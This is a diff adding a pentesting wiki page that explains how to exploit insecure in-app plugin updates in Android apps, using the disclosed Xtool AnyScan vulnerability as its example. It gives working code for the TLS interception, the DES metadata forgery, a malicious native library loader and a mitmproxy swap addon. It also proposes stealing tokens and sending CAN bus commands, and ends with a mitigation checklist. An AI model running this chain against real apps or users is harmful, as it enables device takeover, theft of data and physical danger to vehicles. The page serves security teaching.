diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 9ab45b36071..9cdf73a8f38 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -333,6 +333,7 @@ - [Frida Tutorial 3](mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md) - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md) - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md) + - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md) - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md) - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md) - [Make APK Accept CA Certificate](mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md) diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index 1b0db199296..acf4907eb1f 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -26,6 +26,7 @@ Sometimes it is interesting to **modify the application code** to access **hidde - [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md) - [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md) +- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md) - **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd) - Extract APK from device: diff --git a/src/mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md b/src/mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md new file mode 100644 index 00000000000..8bd891bdd7e --- /dev/null +++ b/src/mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md @@ -0,0 +1,135 @@ +# Insecure In-App Update Mechanisms – Remote Code Execution via Malicious Plugins + +{{#include ../../banners/hacktricks-training.md}} + +Many Android applications implement their **own “plugin” or “dynamic feature” update channels** instead of using the Google Play Store. When the implementation is insecure an attacker able to intercept the traffic can supply **arbitrary native code that will be loaded inside the app process**, leading to full Remote Code Execution (RCE) on the handset – and in some cases on any external device controlled by the app (cars, IoT, medical devices …). + +This page summarises a real‐world vulnerability chain found in the Xtool **AnyScan** automotive-diagnostics app (v4.40.11 → 4.40.40) and generalises the technique so you can audit other Android apps and weaponise the mis-configuration during a red-team engagement. + +--- +## 1. Identifying an Insecure TLS TrustManager + +1. Decompile the APK with jadx / apktool and locate the networking stack (OkHttp, HttpUrlConnection, Retrofit…). +2. Look for a **custom `TrustManager`** or `HostnameVerifier` that blindly trusts every certificate: + +```java +public static TrustManager[] buildTrustManagers() { + return new TrustManager[]{ + new X509TrustManager() { + public void checkClientTrusted(X509Certificate[] chain, String authType) {} + public void checkServerTrusted(X509Certificate[] chain, String authType) {} + public X509Certificate[] getAcceptedIssuers() {return new X509Certificate[]{};} + } + }; +} +``` + +3. If present the application will accept **any TLS certificate** → you can run a transparent **MITM proxy** with a self-signed cert: + +```bash +mitmproxy -p 8080 -s addon.py # see §4 +iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080 # on rooted device / emulator +``` + +## 2. Reverse-Engineering the Update Metadata + +In the AnyScan case each app launch triggers an HTTPS GET to: +``` +https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx +``` +The response body is an **XML document** whose `` nodes contain **Base64-encoded, DES-ECB encrypted** JSON describing every available plugin. + +Typical hunting steps: +1. Locate the crypto routine (e.g. `RemoteServiceProxy`) and recover: + * algorithm (DES / AES / RC4 …) + * mode of operation (ECB / CBC / GCM …) + * hard-coded key / IV (often 56-bit DES keys or 128-bit AES keys in constants) +2. Re-implement the function in Python to decrypt / encrypt the metadata: + +```python +from Crypto.Cipher import DES +from base64 import b64decode, b64encode + +KEY = IV = b"\x2A\x10\x2A\x10\x2A\x10\x2A" # 56-bit key observed in AnyScan + +def decrypt_metadata(data_b64: str) -> bytes: + cipher = DES.new(KEY, DES.MODE_ECB) + return cipher.decrypt(b64decode(data_b64)) + +def encrypt_metadata(plaintext: bytes) -> str: + cipher = DES.new(KEY, DES.MODE_ECB) + return b64encode(cipher.encrypt(plaintext.ljust((len(plaintext)+7)//8*8, b"\x00"))).decode() +``` + +## 3. Craft a Malicious Plugin + +1. Pick any legitimate plugin ZIP and replace the native library with your payload: + +```c +// libscan_x64.so – constructor runs as soon as the library is loaded +__attribute__((constructor)) +void init(void){ + __android_log_print(ANDROID_LOG_INFO, "PWNED", "Exploit loaded! uid=%d", getuid()); + // spawn reverse shell, drop file, etc. +} +``` + +```bash +$ aarch64-linux-android-gcc -shared -fPIC payload.c -o libscan_x64.so +$ zip -r PWNED.zip libscan_x64.so assets/ meta.txt +``` + +2. Update the JSON metadata so that `"FileName" : "PWNED.zip"` and `"DownloadURL"` points to your HTTP server. +3. DES-encrypt + Base64-encode the modified JSON and copy it back inside the intercepted XML. + +## 4. Deliver the Payload with mitmproxy + +`addon.py` example that *silently* swaps the original metadata: + +```python +from mitmproxy import http +MOD_XML = open("fake_metadata.xml", "rb").read() + +def request(flow: http.HTTPFlow): + if b"/UpgradeService.asmx/GetUpdateListEx" in flow.request.path: + flow.response = http.Response.make( + 200, + MOD_XML, + {"Content-Type": "text/xml"} + ) +``` + +Run a simple web server to host the malicious ZIP: +```bash +python3 -m http.server 8000 --directory ./payloads +``` + +When the victim launches the app it will: +* fetch our forged XML over the MITM channel; +* decrypt & parse it with the hard-coded DES key; +* download `PWNED.zip` → unzip inside private storage; +* `dlopen()` the included *libscan_x64.so*, instantly executing our code **with the app’s permissions** (camera, GPS, Bluetooth, filesystem, …). + +Because the plugin is cached on disk the backdoor **persists across reboots** and runs every time the user selects the related feature. + +## 5. Post-Exploitation Ideas + +* Steal session cookies, OAuth tokens, or JWTs stored by the app. +* Drop a second-stage APK and silently install it via `pm install` (the app already has `REQUEST_INSTALL_PACKAGES`). +* Abuse any connected hardware – in the AnyScan scenario you can send arbitrary **OBD-II / CAN bus commands** (unlock doors, disable ABS, etc.). + +--- +### Detection & Mitigation Checklist (blue team) + +* NEVER ship a production build with a custom TrustManager/HostnameVerifier that disables certificate validation. +* Do not download executable code from outside Google Play. If you *must*, sign each plugin with the same **apkSigning v2** key and verify the signature before loading. +* Replace weak/hard-coded crypto with **AES-GCM** and a server-side rotating key. +* Validate the integrity of downloaded archives (signature or at least SHA-256). + +--- +## References + +- [NowSecure – Remote Code Execution Discovered in Xtool AnyScan App](https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/) +- [Android – Unsafe TrustManager patterns](https://developer.android.com/privacy-and-security/risks/unsafe-trustmanager) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file